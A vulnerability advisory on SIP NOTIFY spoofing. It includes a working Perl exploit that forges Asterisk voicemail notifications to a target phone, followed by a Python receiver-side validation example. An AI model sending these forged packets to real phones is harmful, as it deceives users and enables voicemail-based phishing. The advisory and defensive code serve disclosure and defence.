As reported earlier, many SIP implementations do not perform proper Caller-ID checks. This allows an attacker to spoof various NOTIFY messages, such as call-waiting and voice-mail.
For more information see: Notify Message Spoofing Vulnerability With VoIP Phones
Credit:
The information has been provided by beSTORM.
#!/usr/bin/perl -w
# Exploit generated by beSTORM on 2005-07-08 17:49
# All Rights Reserved - Copyright (tm)
use IO::Socket;
use strict;

# Host the UDP packet is sent to.
my $target = shift;
my $print_usage = 0;
if (!$target)
{
    usage();
    print "No target has been supplied, reverting to 192.168.3.10.\n";
    $target = "192.168.3.10";
}

# Address placed in the Request-URI and Contact header.
my $attackerip = shift;
if (!$attackerip)
{
    usage();
    print "Attacker IP address has not been supplied, reverting to 192.168.3.52.\n";
    $attackerip = "192.168.3.52";
}

# Address placed in the To, Via, From and Call-ID headers.
my $attackedip = shift;
if (!$attackedip)
{
    usage();
    print "Contact IP address has not been supplied, reverting to 192.168.3.9.\n";
    $attackedip = "192.168.3.9";
}

print "Will attack $target.\n";
print "Attacker IP address defined as: $attackerip\n";
print "Attacked IP address defined as: $attackedip\n";

my $target_port = 5060;

# message-summary NOTIFY; every line ends in CRLF (\r plus the heredoc newline).
my $packet =<<END;
NOTIFY sip:username:password\@$attackerip SIP/2.0\r
To: <sip:$attackedip:$target_port>\r
Via: SIP/2.0/UDP $attackedip:5060;branch=000000000000000\r
From: "asterisk" <sip:asterisk\@$attackedip>;tag=000000000\r
Contact: <sip:asterisk\@$attackerip>\r
Call-ID: 3121$attackedip\r
CSeq: 102 NOTIFY\r
User-Agent: Asterisk PBX\r
Event: message-summary\r
Content-Type: application/simple-message-summary\r
Max-Forwards: 70\r
Content-Length: 37\r
\r
Messages-Waiting: yes\r
Voicemail: 3/2\r
END

print "Sending: [$packet]\n";
print "Length: ".length($packet)."\n";

# Send the message as a single UDP datagram to port 5060.
socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp")) or die "cannot create socket: $!\n";
my $ipaddr = inet_aton($target);
my $sendto = sockaddr_in($target_port,$ipaddr);
send(PING, $packet, 0, $sendto) == length($packet) or die "cannot send to $target : $target_port : $!\n";
print "Done.\n";

# Print the usage banner once, however many arguments are missing.
sub usage
{
    if ($print_usage) { return; }
    $print_usage = 1;
    print ("#"x50);
    print "\n";
    print "# $0 [hostname] [attackerip] [attackedip]\n";
    print "# hostname\t-\tThe host the packet will be sent to.\n";
    print "# attackerip\t-\tThe IP address from which the packet should be\n";
    print "\t\t\taddressed from (doesn't have to be your IP address).\n";
    print "# attackedip\t-\tThe IP address that you are contacting\n";
    print "\t\t\t(doesn't have to be the hostname IP's address).\n";
    print "\n";
    print "Results may vary depending on how the remote host handles packets.\n";
    print "For example:\n";
    print " * Some SIP Proxies won't look into packets addressed to it (attackedip or attackerip).\n";
    print " * Some SIP Routers won't handle packets that aren't addressed to it.\n";
    print "etc\n";
    print "\n";
}
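The receiver-side check whose absence the advisory describes, as an added example that is not part of the original advisory or of beSTORM's output: a NOTIFY is accepted only if it arrives from the configured proxy and belongs to a subscription the phone itself created. TRUSTED_PROXY, SUBSCRIPTIONS and the function names are assumptions; the sample message is constructed from the script's default addresses.

```python
# Added defensive example (not from the advisory): validate a SIP NOTIFY on receipt.
# TRUSTED_PROXY and SUBSCRIPTIONS are assumed local state; all values are constructed.
TRUSTED_PROXY = "192.168.3.9"
SUBSCRIPTIONS = {("sub-7f3a91@192.168.3.10", "as5d1c2e")}  # (Call-ID, From tag)


def parse_sip(raw):
    """Split a SIP message into (request line, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def from_tag(from_header):
    """Return the tag parameter that follows the From URI, or None."""
    for param in from_header.rpartition(">")[2].split(";")[1:]:
        key, _, value = param.partition("=")
        if key.strip().lower() == "tag":
            return value.strip()
    return None


def check_notify(raw, src_ip):
    """Return the reasons to reject a NOTIFY; an empty list means accept."""
    request, headers, _ = parse_sip(raw)
    if not request.startswith("NOTIFY "):
        return ["not a NOTIFY request"]
    reasons = []
    if src_ip != TRUSTED_PROXY:
        reasons.append("source is not the configured proxy")
    dialog = (headers.get("call-id"), from_tag(headers.get("from", "")))
    if dialog not in SUBSCRIPTIONS:
        reasons.append("no matching subscription dialog")
    return reasons


def sample_notify(call_id, tag):
    """Constructed message-summary NOTIFY shaped like the one in the script."""
    return "\r\n".join([
        "NOTIFY sip:username:password@192.168.3.52 SIP/2.0",
        'From: "asterisk" <sip:asterisk@192.168.3.9>;tag=' + tag,
        "Call-ID: " + call_id,
        "Event: message-summary",
        "Content-Type: application/simple-message-summary",
        "", "Messages-Waiting: yes", "Voicemail: 3/2", ""])
```

A UDP source address can itself be forged, so the dialog match on an unpredictable Call-ID and From tag is the stronger of the two checks.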